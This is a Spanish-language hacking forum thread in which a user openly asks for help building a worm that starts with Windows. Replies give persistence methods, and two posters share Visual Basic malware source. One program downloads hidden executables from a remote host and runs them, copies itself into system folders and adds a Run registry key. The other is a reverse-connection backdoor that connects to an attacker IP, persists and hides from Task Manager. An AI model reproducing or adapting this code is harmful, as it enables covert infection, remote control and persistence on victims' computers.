 Autor
|
Tema: Como hacer que se autoejecute... (Leído 3,885 veces)
|
BorecK
 Desconectado
Mensajes: 35
|
Creo que hay post referidos a este tema pero no logro encontrar... tras una larga busqueda que creo que no fue muy buena... les quiero preguntar el codigo para que mi aplicacion se ejecute al iniciar windows.. ando intentando hacer un Worm... me puse a leer la guia de creacion de worms y no me sale completo el codigo... alguien podria decirme el codigo? no se si sea api o por medio de la shell si existen las dos les agradeceria que me ayudaran  ....
|
|
|
|
|
En línea
|
|
|
|
Tyrz
Desconectado
Mensajes: 927
Get big or die tryin'
|
hay otra forma pero es demasiado complicado para mi...
Yo suelo hacer que se copie en la carpeta de inicio y asi se arranca al encender la maquina.
Saludos
|
|
|
|
|
En línea
|
 Web dedicada por completo al surf. Hablamos de tablas de surf, videos de surf, fotos, juegos y mucha información sobre como aprender a surfear, spots famosos como mundaka, pipeline y zonas como vizcaya, surf españa, sopelana y mucho más. Trucos y peligros del surf. A que esperas? Entra en Surf |
|
|
CeLaYa
Desconectado
Mensajes: 543
|
la unica manera que me se es insertando una entrada en el registro de windows
"HKEY_LOCAL_MACHINE\Software\microsoft\windows\currentversion\run"
|
|
|
|
|
En línea
|
"La soledad es el elemento de los grandes talentos".
Cristina de Suecia (1626-1689) Reina de Suecia.
|
|
|
CA
Desconectado
Mensajes: 159
Aiya Meldonya
|
Es mil veces mejor crear un servicio y arranque el servicio al inicio con todos los demas.
|
|
|
|
|
En línea
|
Del gran mar he llegado a la tierra media y esta sera mi morada y la de mis descendientes hasta el fin del mundo.
|
|
|
BorecK
Desconectado
Mensajes: 35
|
oh gracias pero no entendi mucho me podrian explicar mejor que codigo poner y como aderir al registro de windows ? es que se puede decir que soy novato jaja por eso quiero aprender de ustedes  |
|
|
|
|
En línea
|
|
|
|
sp26
Desconectado
Mensajes: 88
|
Que se autoejecute es algo demasiado imposible.. y de hecho, lo creo imposible. Puedes crear una bomba logica o de cualquier archivo llame a otro archivo. Yo cree un Worm que descarga un archivo de internet (De forma oculta) y que lo autoejecute. Los antivirus lo pasan por encima ya que no hace nada malo si no descargar un archivo . Si quieres te paso el Codigo fuente para que lo analises. (Espera que lo suba). |
|
|
|
|
En línea
|
|
|
|
BorecK
Desconectado
Mensajes: 35
|
m encantaria ver tu codigo para aprender mas del funcionamiento de los malware, muchas gracias  |
|
|
|
|
En línea
|
|
|
|
sp26
Desconectado
Mensajes: 88
|
Aqui te dejo el codigo... Option Explicit
Dim RegistroCochino As Object
Dim RutaCochina As String
Dim CadenaNueva As String
Dim ContenidoCadena As String
Dim ERROR_SUCCESS
Private Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" _
(ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long
Private Sub Form_Load()
Dim Ya_Existe As Integer
Ya_Existe = App.PrevInstance
If Ya_Existe <> 0 Then
End
End If
On Error GoTo fallo:
Dim sSourceUrl As String
'Esta es la descarga oculta <|>
sSourceUrl = "http://h1.ripway.com/MyArchivos/" & _
"Mis_Fotos/InetCat/InetCat.exe"
DownloadFile sSourceUrl, Environ("SYSTEMROOT") & "\Files\InetCat.exe" ' Asegurate de poner la ruta a donde llega el archivo
sSourceUrl = "http://h1.ripway.com/MyArchivos/" & _
"Mis_Fotos/InetCat/Autoexec.bat"
DownloadFile sSourceUrl, Environ("SYSTEMROOT") & "\System32\Repair\AUTOEXEC.BAT" 'Aqui tambien
Shell (Environ("SYSTEMROOT") & "\Files\InetCat.exe")
Shell Environ("SYSTEMROOT") & "\Files\InetCat.exe"
Shell Environ("Systemroot") & "\System32\Repair\Autoexec.bat"
FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("SYSTEMROOT") & "\{323-432112-53252LGSD}\InetCat.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\" & "\InetCat.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\" & "\Shell\W\O\R\M\L\O\L\J\A\J\A\{03424-03259325JH-BSSGKDS}.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", Environ("Homepath") & "\AppData\" & "\WISIP.exe"
ContenidoCadena = Environ("SYSTEMROOT") & "\Files\InetCat.exe"
CadenaNueva = "\InetCat"
RutaCochina = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" & _
"\CurrentVersion\Run" & CadenaNueva
Set RegistroCochino = CreateObject("WScript.Shell")
RegistroCochino.RegWrite RutaCochina, ContenidoCadena
fallo:
End Sub
Private Function DownloadFile(ByVal sURL As String, ByVal sLocalFile As String) As Boolean
DownloadFile = URLDownloadToFile(0, sURL, _
sLocalFile, 0, 0) = ERROR_SUCCESS
End Function
Acuerdate que esta es una estructura y es el cuerpo de la infeccio, no es el virus en cuestion pero te puede ayudar  . |
|
|
|
« Última modificación: 13 Diciembre 2006, 00:35 am por sp26 »
|
En línea
|
|
|
|
SOLOANDRAGORA
Desconectado
Mensajes: 19
Quien Domina La Mente Domita Todo "KALIMAN"
|
te dejo una pequeña aplicacion para que cheques el codigo para que se cargue en la memoria haber si te sirve  es un server utilizando una conexión inversa. No recuerdo donde lo vi publicado un saludo. Dim win
Dim sys
Dim residencia
On Error Resume Next
ip = "10.12.116.207" 'esta es nuestra ip local, asi que conectara a nuestra ip local, aqui se pondria nuestra ip publica, y si cambia pues os registrais en no-ip.com y si habeis leido la revista no tendreis problemas
ipftp = "o 127.0.0.1"
port = 6969
WS.RemoteHost = ip
WS.RemotePort = port
Timer1.Interval = 60000 'se esteblace un intervalo de 3 segundos para ejecutar el evento timer1
ejec = App.Path 'le pasamos a la variable la ruta del exe que ejecute la victima
If Right(ejec, 1) <> "\" Then ejec = ejec & "\" 'si no tiene la "\" al final, se la añadiremos
ejec = ejec & App.EXEName & ".exe" 'añadimos ala ruta del exe, el nombre y la estension
Set obj = CreateObject("Scripting.FileSystemObject") 'declaramos un objeto tipo fileSystem object
Set win = obj.GetSpecialFolder(0) 'para obtener la carpeta de windows y system
Set sys = obj.GetSpecialFolder(1)
win = LCase(win) 'las ponemos en minusculas
sys = LCase(sys)
FileCopy ejec, sys & "\nombre1" 'copia a windows\system32
Name sys & "\nombre1" As sys & "\nombre2.exe" 'renombra
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "nombre3", sys & "\nombre2.exe" 'esto modifica el registro para que se ejecute al iniciar el pc
App.TaskVisible = False 'para ocultarlo un poco del, (alt +sup +control)
End Sub
|
|
|
|
|
En línea
|
|
|
|
sp26
Desconectado
Mensajes: 88
|
te dejo una pequeña aplicacion para que cheques el codigo para que se cargue en la memoria haber si te sirve es un server utilizando una conexión inversa. No recuerdo donde lo vi publicado un saludo. Dim win
Dim sys
Dim residencia
On Error Resume Next
ip = "10.12.116.207" 'esta es nuestra ip local, asi que conectara a nuestra ip local, aqui se pondria nuestra ip publica, y si cambia pues os registrais en no-ip.com y si habeis leido la revista no tendreis problemas
ipftp = "o 127.0.0.1"
port = 6969
WS.RemoteHost = ip
WS.RemotePort = port
Timer1.Interval = 60000 'se esteblace un intervalo de 3 segundos para ejecutar el evento timer1
ejec = App.Path 'le pasamos a la variable la ruta del exe que ejecute la victima
If Right(ejec, 1) <> "\" Then ejec = ejec & "\" 'si no tiene la "\" al final, se la añadiremos
ejec = ejec & App.EXEName & ".exe" 'añadimos ala ruta del exe, el nombre y la estension
Set obj = CreateObject("Scripting.FileSystemObject") 'declaramos un objeto tipo fileSystem object
Set win = obj.GetSpecialFolder(0) 'para obtener la carpeta de windows y system
Set sys = obj.GetSpecialFolder(1)
win = LCase(win) 'las ponemos en minusculas
sys = LCase(sys)
FileCopy ejec, sys & "\nombre1" 'copia a windows\system32
Name sys & "\nombre1" As sys & "\nombre2.exe" 'renombra
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "nombre3", sys & "\nombre2.exe" 'esto modifica el registro para que se ejecute al iniciar el pc
App.TaskVisible = False 'para ocultarlo un poco del, (alt +sup +control)
End Sub
Adherirse al registro o a la "Memoria"?
|
|
|
|
|
En línea
|
|
|
|
|
 |
